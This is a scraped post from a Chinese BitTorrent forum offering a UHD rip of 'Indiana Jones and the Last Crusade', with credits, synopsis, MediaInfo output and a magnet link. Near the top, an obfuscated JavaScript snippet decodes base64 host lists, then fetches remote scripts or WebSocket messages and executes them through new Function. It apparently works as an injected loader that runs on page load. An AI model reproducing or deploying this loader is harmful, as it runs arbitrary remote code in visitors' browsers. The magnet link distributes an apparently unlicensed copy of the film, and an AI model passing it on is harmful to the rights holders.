夺宝奇兵3[国英多音轨/简繁字幕].Indiana.Jones.And.The.Last.Crusade.1989.UHD.BluRay.2160p.2Audio.TrueHD.Atmos.7.1.x265.10bit.HDR 31.35GB

版主小s 1月前 237

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 夺宝奇兵3 / 印地安纳?琼斯和最后的十字军 / 夺宝奇兵3:圣战奇兵 / 圣战奇兵 / 印地安纳?琼斯之圣战奇兵
◎片  名 Indiana Jones and the Last Crusade
◎年  代 1989
◎产  地 美国 / 英国
◎类  别 剧情 / 动作 / 奇幻 / 冒险
◎语  言 英语 / 德语 / 希腊语 / 阿拉伯语
◎上映日期 1989-05-24(美国)
◎IMDb链接 https://www.imdb.com/title/tt0097576/
◎豆瓣评分 8.2/10 (58296人评价)
◎豆瓣链接 https://movie.douban.com/subject/1293471/
◎片  长 127分钟
◎导  演 史蒂文·斯皮尔伯格 Steven Spielberg (id:1054440)
◎编  剧 杰弗里·鲍姆 Jeffrey Boam (id:1037139)
       乔治·卢卡斯 George Lucas (id:1054507)
       门诺·迈依杰斯 Menno Meyjes (id:1291952)
       菲利普·考夫曼 Philip Kaufman (id:1027416)
◎演  员 哈里森·福特 Harrison Ford (id:1009238)
       肖恩·康纳利 Sean Connery (id:1018982)
       丹霍姆·艾略特 Denholm Elliott (id:1019108)
       瑞凡·菲尼克斯 River Phoenix (id:1048001)
       约翰·瑞斯-戴维斯 John Rhys-Davies (id:1147054)
       艾莉森·杜迪 Alison Doody (id:1040627)
       弗农·多布切夫 Vernon Dobtcheff (id:1022603)
       帕特·罗奇 Pat Roach (id:1045132)
       迈克尔·谢尔德 Michael Sheard (id:1019233)
       罗纳德·莱西 Ronald Lacey (id:1111486)
       伊斯拉·布莱尔 Isla Blair (id:1061540)
       阿列克谢·赛尔 Alexei Sayle (id:1023092)
       妮娜·阿姆斯特朗 Nina Armstrong (id:1277065)
       Nick Gillard Nick Gillard (id:1276467)
       尤金·里皮斯基 Eugene Lipinski (id:1041403)
       朱利安·格洛弗 Julian Glover (id:1002790)
       迈克尔·伯恩 Michael Byrne (id:1077558)
       布拉德利·格雷格 Bradley Gregg (id:1040753)
       乔治·卢卡斯 George Lucas (id:1054507)
       罗伯特·沃茨 Robert Watts (id:1300525)
       约翰·威廉姆斯 John Williams (id:1054692)
       乔治·卢卡斯 George Lucas (id:1054507)
       朱迪·泰勒 Judy Taylor (id:1298995)
       迈克·芬顿 Mike Fenton (id:1283570)
       Valorie Massalas Valorie Massalas (id:1291230)
       彼得·霍威特 Peter Howitt (id:1287039)
       安东尼·鲍威尔 Anthony Powell (id:1131122)
       乔安娜·约翰斯顿 Joanna Johnston (id:1287829)
       科林·贾米森 Colin Jamison (id:1287572)
       Jane Royle Jane Royle (id:1296256)
       彼得·罗勃-金 Peter Robb-King (id:1295741)
       尼克·杜德曼 Nick Dudman (id:1282763)
       Robert L. Stevenson Robert L. Stevenson (id:1298419)
       佐尔坦·埃雷克 Zoltan Elek (id:1283102)
       宝琳·黑斯 Pauline Heys (id:1286585)
       Eddie Knight Eddie Knight (id:1288756)
       Katalin Elek Katalin Elek (id:1283086)
       Dennis Maguire Dennis Maguire (id:1290727)
       尤萨夫·博克哈里 Yousaf Bokhari (id:1278899)
       Wes Takahashi Wes Takahashi (id:1298841)
       芭芭拉·布伦南 Barbara Brennan (id:1279246)
       斯蒂凡·杜普里斯 Stephan Dupuis (id:1282848)
       道格拉斯·斯迈斯 Douglas Smythe (id:1297968)
       Pat Sweeney Pat Sweeney (id:1298721)
       肯尼斯·史密斯 Kenneth Smith (id:1297900)
       史蒂夫·高利 Steve Gawley (id:1284643)
       布拉德·库恩 Brad Kuehn (id:1289086)
       爱德华·赫希 Edward Hirsh (id:1286690)
       保罗·哈特森 Paul Huston (id:1287204)
       汤姆·柏提诺 Tom Bertino (id:1278530)
       Charles Bailey Charles Bailey (id:1277693)
       托马斯·罗塞特 Thomas Rosseter (id:1296146)
       约翰·埃利斯 John Ellis (id:1305506)
       杰克·莫多万 Jack Mongovan (id:1292344)
       布鲁斯·沃尔特斯 Bruce Walters (id:1300370)
       迈克尔·J·麦卡利斯特尔 Michael J. McAlister (id:1291408)
       马克·萨利文 Mark Sullivan (id:1298630)
       上杉佑子 Yusei Uesugi (id:1299710)
       托马斯·J·史密斯 Thomas J. Smith (id:1276658)
       乔恩·亚历山大 Jon Alexander (id:1276987)
       梅利莎·泰勒 Melissa Taylor (id:1299007)
       史蒂文·E·安德森 Steven E. Anderson (id:1277228)

◎标  签 冒险 / 美国 / 动作 / 探险 / 经典 / 1989 / 魔幻 / 奇幻

◎简  介
  传说用耶稣在最后的晚餐中用到的圣杯喝水,便能长生不老。在一次掘金活动中,记载圣杯的碑石被发现,圣杯存在的可能吸引着大批的疯狂的人展开寻找。印第安纳琼斯博士(Harrison Ford饰)也是他们中的一员,甚至连他的父亲老琼斯(Sean Connery饰)也陷入其中——但他给琼斯留下圣杯的笔记后便不知所踪。                                    
                                踏上威尼斯的土地,琼斯和事先约好的史奈达博士(Alison Doody饰)会面,他们在图书馆里凭线索找到圣盾后,却开始遭到莫名的来自十字剑兄弟的追杀。                                    
                                一番波折后,琼斯终于找到了老琼斯,同时,史奈达的纳粹身份暴露,笔记被抢走。圣杯随时都有可能落入纳粹的手中。                                    
                                于是,琼斯父子俩开始联袂上演拯救圣杯的精彩大戏!

◎获奖情况 (共4项)
  第62届奥斯卡金像奖 (1990)
  最佳音效剪辑
  最佳音响(提名)
  最佳原创配乐(提名)
   └──约翰·威廉姆斯 (id:1054692)

  第13届日本电影学院奖 (1990)
  最佳外语片(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 113664966418941141059032549645023969168 (0x55831384D18F0DB5340A37F71C63FF90)

  4. Complete name                            : Indiana.Jones.And.The.Last.Crusade.198[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 31.3 GiB

  8. Duration                                 : 2 h 6 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 35.4 Mb/s

  11. Encoded date                             : UTC 2021-08-03 03:27:23

  12. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. HDR format                               : SMPTE ST 2086, HDR10 compatible

  20. Codec ID                                 : V_MPEGH/ISO/HEVC

  21. Duration                                 : 2 h 6 min

  22. Bit rate                                 : 24.3 Mb/s

  23. Width                                    : 3 840 pixels

  24. Height                                   : 1 634 pixels

  25. Display aspect ratio                     : 2.35:1

  26. Frame rate mode                          : Constant

  27. Frame rate                               : 23.976 (24000/1001/53354) FPS

  28. Color space                              : YUV

  29. Chroma subsampling                       : 4:2:0 (Type 2)

  30. Bit depth                                : 10 bits

  31. Bits/(Pixel*Frame)                       : 0.162

  32. Stream size                              : 21.6 GiB (69%)

  33. Title                                    : HEVC, [email protected]@High, 24/1.001 fps @ 24332 kbps

  34. Writing library                          : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings                        : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1634 / interlace=0 / total-frames=182503 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=1000,516 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language                                 : English

  37. Default                                  : Yes

  38. Forced                                   : No

  39. Color range                              : Limited

  40. Color primaries                          : BT.2020

  41. Transfer characteristics                 : PQ

  42. Matrix coefficients                      : BT.2020 non-constant

  43. Mastering display color primaries        : Display P3

  44. Mastering display luminance              : min: 0.0050 cd/m2, max: 4000 cd/m2

  45. Maximum Content Light Level              : 1000 cd/m2

  46. Maximum Frame-Average Light Level        : 516 cd/m2


  47. Audio #1

  48. ID                                       : 2

  49. Format                                   : MLP FBA 16-ch

  50. Format/Info                              : Meridian Lossless Packing FBA with 16-channel presentation

  51. Commercial name                          : Dolby TrueHD with Dolby Atmos

  52. Codec ID                                 : A_TRUEHD

  53. Duration                                 : 2 h 6 min

  54. Bit rate mode                            : Variable

  55. Bit rate                                 : 4 034 kb/s

  56. Maximum bit rate                         : 5 772 kb/s

  57. Channel(s)                               : 8 channels

  58. Channel layout                           : L R C LFE Ls Rs Lb Rb

  59. Sampling rate                            : 48.0 kHz

  60. Frame rate                               : 1 200.000 FPS (40 SPF)

  61. Compression mode                         : Lossless

  62. Stream size                              : 3.57 GiB (11%)

  63. Title                                    : English Dolby TrueHD 7.1 (Atmos) @ 4674 kbps

  64. Language                                 : English

  65. Default                                  : Yes

  66. Forced                                   : No

  67. Number of dynamic objects                : 11

  68. Bed channel count                        : 1 channel

  69. Bed channel configuration                : LFE


  70. Audio #2

  71. ID                                       : 3

  72. Format                                   : AC-3

  73. Format/Info                              : Audio Coding 3

  74. Commercial name                          : Dolby Digital

  75. Codec ID                                 : A_AC3

  76. Duration                                 : 2 h 6 min

  77. Bit rate mode                            : Constant

  78. Bit rate                                 : 640 kb/s

  79. Channel(s)                               : 6 channels

  80. Channel layout                           : L R C LFE Ls Rs

  81. Sampling rate                            : 48.0 kHz

  82. Frame rate                               : 31.250 FPS (1536 SPF)

  83. Compression mode                         : Lossy

  84. Stream size                              : 581 MiB (2%)

  85. Title                                    : English Dolby Digital Audio 5.1 @ 640 kbps

  86. Language                                 : English

  87. Service kind                             : Complete Main

  88. Default                                  : No

  89. Forced                                   : No


  90. Audio #3

  91. ID                                       : 4

  92. Format                                   : DTS

  93. Format/Info                              : Digital Theater Systems

  94. Codec ID                                 : A_DTS

  95. Duration                                 : 2 h 6 min

  96. Bit rate mode                            : Constant

  97. Bit rate                                 : 754 kb/s

  98. Channel(s)                               : 6 channels

  99. Channel layout                           : C L R Ls Rs LFE

  100. Sampling rate                            : 48.0 kHz

  101. Frame rate                               : 93.750 FPS (512 SPF)

  102. Bit depth                                : 24 bits

  103. Compression mode                         : Lossy

  104. Stream size                              : 685 MiB (2%)

  105. Title                                    : Mandarin DTS 5.1 @ 768 kbps (驴脾气混音)

  106. Language                                 : Chinese

  107. Default                                  : No

  108. Forced                                   : No


  109. Audio #4

  110. ID                                       : 5

  111. Format                                   : DTS XLL

  112. Format/Info                              : Digital Theater Systems

  113. Commercial name                          : DTS-HD Master Audio

  114. Codec ID                                 : A_DTS

  115. Duration                                 : 2 h 6 min

  116. Bit rate mode                            : Variable

  117. Bit rate                                 : 5 385 kb/s

  118. Channel(s)                               : 8 channels

  119. Channel layout                           : C L R LFE Lb Rb Lss Rss

  120. Sampling rate                            : 48.0 kHz

  121. Frame rate                               : 93.750 FPS (512 SPF)

  122. Bit depth                                : 24 bits

  123. Compression mode                         : Lossless

  124. Stream size                              : 4.77 GiB (15%)

  125. Title                                    : DTS-HD Master Audio 7.1 @ 4623 kbps (重编码)

  126. Language                                 : Chinese

  127. Default                                  : No

  128. Forced                                   : No


  129. Text #1

  130. ID                                       : 6

  131. Format                                   : PGS

  132. Codec ID                                 : S_HDMV/PGS

  133. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  134. Duration                                 : 1 h 58 min

  135. Bit rate                                 : 25.3 kb/s

  136. Count of elements                        : 2388

  137. Stream size                              : 21.4 MiB (0%)

  138. Title                                    : Eng/SUP

  139. Language                                 : English

  140. Default                                  : No

  141. Forced                                   : No


  142. Text #2

  143. ID                                       : 7

  144. Format                                   : PGS

  145. Codec ID                                 : S_HDMV/PGS

  146. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  147. Duration                                 : 1 h 59 min

  148. Bit rate                                 : 27.1 kb/s

  149. Count of elements                        : 2612

  150. Stream size                              : 23.1 MiB (0%)

  151. Title                                    : Eng/SUP  SDH

  152. Language                                 : English

  153. Default                                  : No

  154. Forced                                   : No


  155. Text #3

  156. ID                                       : 8

  157. Format                                   : PGS

  158. Codec ID                                 : S_HDMV/PGS

  159. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  160. Duration                                 : 2 h 5 min

  161. Bit rate                                 : 19.9 kb/s

  162. Count of elements                        : 2180

  163. Stream size                              : 17.9 MiB (0%)

  164. Title                                    : Chs/SUP  原盘简体

  165. Language                                 : Chinese

  166. Default                                  : Yes

  167. Forced                                   : No


  168. Text #4

  169. ID                                       : 9

  170. Format                                   : PGS

  171. Codec ID                                 : S_HDMV/PGS

  172. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  173. Duration                                 : 2 h 4 min

  174. Bit rate                                 : 14.9 kb/s

  175. Count of elements                        : 1776

  176. Stream size                              : 13.3 MiB (0%)

  177. Title                                    : Cht/SUP  原盘繁体(HK)

  178. Language                                 : Chinese

  179. Default                                  : No

  180. Forced                                   : No


  181. Text #5

  182. ID                                       : 10

  183. Format                                   : PGS

  184. Codec ID                                 : S_HDMV/PGS

  185. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  186. Duration                                 : 2 h 6 min

  187. Bit rate                                 : 18.7 kb/s

  188. Count of elements                        : 1730

  189. Stream size                              : 16.9 MiB (0%)

  190. Title                                    : Cht/SUP  原盘繁体(TW)

  191. Language                                 : Chinese

  192. Default                                  : No

  193. Forced                                   : No


  194. Text #6

  195. ID                                       : 11

  196. Format                                   : PGS

  197. Codec ID                                 : S_HDMV/PGS

  198. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  199. Duration                                 : 2 h 1 min

  200. Bit rate                                 : 28.6 kb/s

  201. Count of elements                        : 1755

  202. Stream size                              : 24.8 MiB (0%)

  203. Title                                    : Chs/SUP  简英双语

  204. Language                                 : Chinese

  205. Default                                  : No

  206. Forced                                   : No


  207. Text #7

  208. ID                                       : 12

  209. Format                                   : PGS

  210. Codec ID                                 : S_HDMV/PGS

  211. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  212. Duration                                 : 2 h 1 min

  213. Bit rate                                 : 29.4 kb/s

  214. Count of elements                        : 1755

  215. Stream size                              : 25.5 MiB (0%)

  216. Title                                    : Cht/SUP  繁英双语

  217. Language                                 : Chinese

  218. Default                                  : No

  219. Forced                                   : No


  220. Menu

  221. 00:00:00.000                             : en:第 01 章

  222. 00:04:41.907                             : en:第 02 章

  223. 00:08:11.032                             : en:第 03 章

  224. 00:11:49.042                             : en:第 04 章

  225. 00:14:14.437                             : en:第 05 章

  226. 00:17:19.413                             : en:第 06 章

  227. 00:22:14.583                             : en:第 07 章

  228. 00:24:51.448                             : en:第 08 章

  229. 00:26:52.152                             : en:第 09 章

  230. 00:30:15.564                             : en:第 10 章

  231. 00:36:31.564                             : en:第 11 章

  232. 00:41:10.426                             : en:第 12 章

  233. 00:44:41.387                             : en:第 13 章

  234. 00:47:42.401                             : en:第 14 章

  235. 00:50:23.729                             : en:第 15 章

  236. 00:54:47.618                             : en:第 16 章

  237. 00:56:31.138                             : en:第 17 章

  238. 01:00:16.154                             : en:第 18 章

  239. 01:03:08.743                             : en:第 19 章

  240. 01:05:31.386                             : en:第 20 章

  241. 01:07:47.313                             : en:第 21 章

  242. 01:10:43.531                             : en:第 22 章

  243. 01:13:36.329                             : en:第 23 章

  244. 01:16:11.358                             : en:第 24 章

  245. 01:18:57.149                             : en:第 25 章

  246. 01:21:20.084                             : en:第 26 章

  247. 01:23:28.462                             : en:第 27 章

  248. 01:25:16.778                             : en:第 28 章

  249. 01:26:58.088                             : en:第 29 章

  250. 01:31:21.976                             : en:第 30 章

  251. 01:36:57.103                             : en:第 31 章

  252. 01:38:53.469                             : en:第 32 章

  253. 01:41:32.586                             : en:第 33 章

  254. 01:49:18.302                             : en:第 34 章

  255. 01:56:05.709                             : en:第 35 章

  256. 02:00:05.949                             : en:第 36 章



TAGS 动作 奇幻 冒险 剧情

磁力链:
  • magnet:?xt=urn:btih:5E9F0587A2C7F3745AC29FCB84D598C2511A4C02
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回